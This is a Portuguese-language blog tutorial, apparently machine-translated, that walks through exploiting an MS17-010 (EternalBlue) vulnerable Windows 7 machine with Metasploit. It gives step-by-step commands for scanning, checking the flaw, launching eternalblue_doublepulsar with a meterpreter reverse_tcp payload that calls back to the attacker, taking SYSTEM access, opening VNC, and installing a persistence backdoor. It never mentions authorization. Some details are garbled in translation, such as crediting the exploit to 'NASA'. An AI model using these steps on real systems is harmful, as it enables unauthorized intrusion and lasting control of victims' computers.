Como discutimos o TOP 25 BEST KALI LINUX TOOL, e colocamos METASPLOIT em primeiro lugar na lista, agora vamos discutir e aprender sobre METASPLOIT. Nós recomendamos que você esteja familiarizado com Metasploit.

Metasploit inicialmente criado por H. D Moore em 2003, até ser adquirido e desenvolvido pela Rapid7 em 21 de outubro de 2009. Metasploit-framework é completamente escrito usando Ruby, e é um pacote padrão instalado no sistema Kali Linux (e também quase todo o sistema operacional Penetration Testing, eu acho). É um kit favorito de hackers ou penetration testers para pesquisar vulnerabilidades de segurança, desenvolver e executar exploits em alvos, e outros desenvolvimentos de segurança.

Metasploit vem com várias edições, geralmente divididas em duas categorias, versão gratuita e versão paga. As versões gratuitas: Metasploit Framework Community Edition (interface baseada na CLI) e Armitage (interface baseada na GUI). As versões pagas : Metasploit Express, Metasploit Pro e Cobalt Strike (é semelhante ao Armitage, que é fornecido pela Strategic Cyber LLC).

Metasploit permite aos utilizadores criar (ou desenvolver) o seu próprio código de exploração, mas não se preocupe se não souber codificar, o Metasploit tem tantos módulos e eles são continuamente actualizados. Actualmente o Metasploit tem mais de 1600 exploits e 500 cargas úteis. A maneira simples de entender o que são exploits e cargas úteis, um exploit é basicamente como o atacante entrega a carga útil, através do buraco de vulnerabilidade do sistema alvo. Quando o atacante lança o exploit que contém uma carga útil contra um alvo vulnerável, então a carga útil implantada (carga útil usada para conectar de volta ao atacante para obter acesso remoto contra o sistema alvo), nesta fase o exploit é feito, e torna-se irrelevante.

“O Metasploit não é uma ferramenta instantânea de hacking, é uma estrutura insana”

Este artigo do Metasploit é sobre a realização de testes de penetração contra um sistema alvo usando o seguinte fluxo:

  • Vulnerability Scanning
  • Vulnerability Assessment
  • Explorar
  • Ganhar acesso remoto – possuir o sistema

PREPARAÇÃO

Certifique-se de que nosso Kali Linux tem a última versão atualizada. Haverá melhorias em cada atualização. Execute os seguintes comandos:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Agora nossa máquina está atualizada, agora vamos começar por disparar o console metasploit. No terminal, digite:

~# msfconsole

E também você precisa de qualquer editor de texto, Gedit ou Leafpad, para coletar algumas informações ao longo do caminho antes de compilarmos o ataque. Primeiro, identifique seu endereço IP da interface sem fio, o IP do roteador e a máscara de rede.

Baseado nas informações acima, anotamos a WLAN1 e o endereço IP do roteador, e a máscara de rede. Assim, a nota deve ser parecida com isto:

IP do router (LHOST): 192.168.1.56
IP do gateway / roteador: 192.168.1.1
Máscara de rede: 255.255.255.0(/24)

PASSO 1 : CANALIZAÇÃO DE VULNERABILIDADE

Na consola metasploit, primeiro recolhemos informações, tais como endereço IP de destino, Sistema Operativo, portas abertas, e a vulnerabilidade. O Metasploit nos permite executar o NMap diretamente do console. Com base nas informações acima, execute este comando para realizar nossa tarefa de coleta de informações.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Do comando acima obtemos o resultado abaixo.

Temos um alvo vulnerável rodando o Sistema Operacional Windows, e o vulnerável está no serviço SMBv1. Então, acrescente a note.

IP alvo (RHOST): 192.168.1.57
Vulnerabilidade: Vulnerabilidade de execução de código remoto em servidores Microsoft SMBv1 (ms17-010)

STEP 2 : VULNERABILITY ASSESSMENT

Agora conhecemos o alvo e sua vulnerabilidade. Vamos verificar a vulnerabilidade na consola metasploit

Agora conhecemos o alvo e a sua vulnerabilidade. Vamos verificar a vulnerabilidade no console metasploit usando o módulo auxiliar smb_scanner. Execute o seguinte comando:

>

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run

>

Metasploit está confiante sobre a vulnerabilidade, e mostra a edição exata do SO Windows. Adicione à nota:

Sistema alvo: Windows 7 Ultimate 7600

STEP 3 : EXPLORAÇÃO

Por sorte, o metasploit não tem módulo de exploração relacionado com esta vulnerabilidade. Mas, não se preocupe, há um cara de fora exposto e escreveu o código do exploit. O exploit é familiar, já que é iniciado pela NASA, é chamado EternalBlue-DoublePulsar. Você pode pegá-lo daqui, ou pode seguir o guia do vídeo tutorial abaixo para instalar o código do exploit no seu framework metasploit.

Após ter seguido o guia acima, (certifique-se de que o caminho é o mesmo do tutorial). Agora, você está pronto para explorar o alvo. Execute os seguintes comandos:

>

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Explorar

>>3942>

Boom… A exploração tem sucesso, temos sessão de interpretação de medidores. Como mencionei anteriormente, assim que o exploit for iniciado, irá implementar a carga útil, que é, aqui usamos, windows/meterpreter/reverse_tcp.

STEP 4 : GAINING REMOTE ACCESS

Vamos explorar os comandos mais disponíveis, digite ‘?’ (sem ponto de interrogação) e veja os comandos disponíveis listados. O Stdapi, comandos do sistema são:

Para ver mais informações sobre o sistema alvo, use o comando ‘sysinfo’. A saída deve se parecer com isto.

Desde que injetamos no processo do sistema mais cedo (spoolsv.exe), temos o System Privilege. Nós possuímos o alvo. Nós podemos fazer muito com o comando para o alvo. Por exemplo, podemos executar o RDP, ou apenas configurar o VNC remoto. Para executar o serviço VNC digite command:

~# run vnc

O resultado deve ser a área de trabalho da máquina alvo, é parecido com isto.

A parte mais importante é criar uma backdoor, assim sempre que o alvo for desconectado da nossa máquina, a máquina alvo tentará se conectar de volta, novamente a nós. A backdooring é usada para manter o acesso, é como pescar, você não vai jogar seu peixe de volta à água uma vez que você tem o peixe, certo? Você quer fazer algo com o peixe, seja para guardá-lo na geladeira para outras ações, como cozinhar ou vendê-lo por dinheiro.

Meterpreter tem esta persistente função de backdooring. Execute o seguinte comando, e dê uma olhada nos parâmetros e argumentos disponíveis.

meterpreter > run persistence -h

Se você não está confortável com este script depreciado, o mais novo módulo de persistência está sob post/windows/manage/persistence_exe. Você pode explorá-lo mais a fundo sozinho.

Metasploit é enorme, não é apenas uma ferramenta, é um framework, considere que tem mais de 1600 exploits e cerca de 500 cargas úteis. Um artigo é apenas adequado para o grande quadro da utilização ou ideia geral. Mas, você aprendeu tanto com este artigo.

“Quanto mais você segue o fluxo de ataque, mais você tem um desafio sem esforço.”

Deixe uma resposta

O seu endereço de email não será publicado.